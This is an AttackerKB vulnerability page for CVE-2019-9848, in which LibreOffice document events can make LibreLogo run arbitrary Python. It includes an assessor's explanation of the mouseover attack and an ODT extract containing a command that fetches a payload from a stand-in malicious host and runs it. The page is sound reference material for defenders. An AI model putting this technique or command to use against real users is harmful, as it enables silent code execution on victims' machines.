AttackerKB AKB:0A2A5BA5-E17C-4BED-A99F-309D1366D97A
History: Jul 17, 2019 - 12:00 a.m.

CVE-2019-9848


EPSS: 0.217 (Low)
Percentile: 96.5%

LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. In the fixed versions, LibreLogo cannot be called from a document event handler. This issue affects: Document Foundation LibreOffice versions prior to 6.2.5.

Recent assessments:

kevthehermit at April 23, 2020 8:22pm UTC reported:

This forms the basis of a social engineering attack. It requires LibreOffice and Python installed. This means it is a limited pool of target victims. However, this is a common setup on Linux desktop environments, which may make developers a target.

To exploit this vulnerability, an attacker creates a document with a text-written command and a hyperlink that, upon user mouseover, runs a program through the LibreLogo extension. When a user loads up the document in a program such as LibreOffice Writer, the macro is enabled automatically.

The hyperlink is set to include the macro LibreLogo:run. This in turn runs the previous text command through LibreLogo as if it’s attempting to use the information to create turtle vector graphics. This causes whatever is being called in the text command to run – be it malware, a program, or a malicious file download.

An example extract from an odt file can be seen below:

   <txt ptr="0x4e9a180" id="3" symbol="11SwTextFrame" next="10" upper="2" txtNodeIndex="9">
    <infos>
     <bounds left="8181" top="1418" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
import os    <Text nLength="9" nType="POR_PARA" nHeight="299" nWidth="989" Portion="import os"/>
    <LineBreak nWidth="989" Line="import os"/>
    <Finish/>
   </txt>
   <txt ptr="0x7c6e450" id="10" symbol="11SwTextFrame" next="15" prev="3" upper="2" txtNodeIndex="10">
    <infos>
     <bounds left="8181" top="1717" width="9638" height="598" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="598"/>
    </infos>
os.system(“wget http://immersivemalware.bad:8001/payload.sh ; chmod +x payload.sh ; ./payload.sh”)    <Text nLength="84" nType="POR_PARA" nHeight="299" nWidth="9264" Portion="os.system(“wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <LineBreak nWidth="9264" Line="os.system(“wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <Text nLength="14" nType="POR_LAY" nHeight="299" nWidth="1458" Portion="./payload.sh”)"/>
    <LineBreak nWidth="1458" Line="./payload.sh”)"/>
    <Finish/>
   </txt>
   <txt ptr="0x4e2ac00" id="15" symbol="11SwTextFrame" prev="10" upper="2" txtNodeIndex="11">
    <infos>
     <bounds left="8181" top="2315" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
Run    <Text nLength="3" nType="POR_PARA" nHeight="299" nWidth="434" Portion="Run"/>
    <LineBreak nWidth="434" Line="Run"/>
    <Finish/>
   </txt>

Assessed Attacker Value: 1
Assessed Attacker Value: 3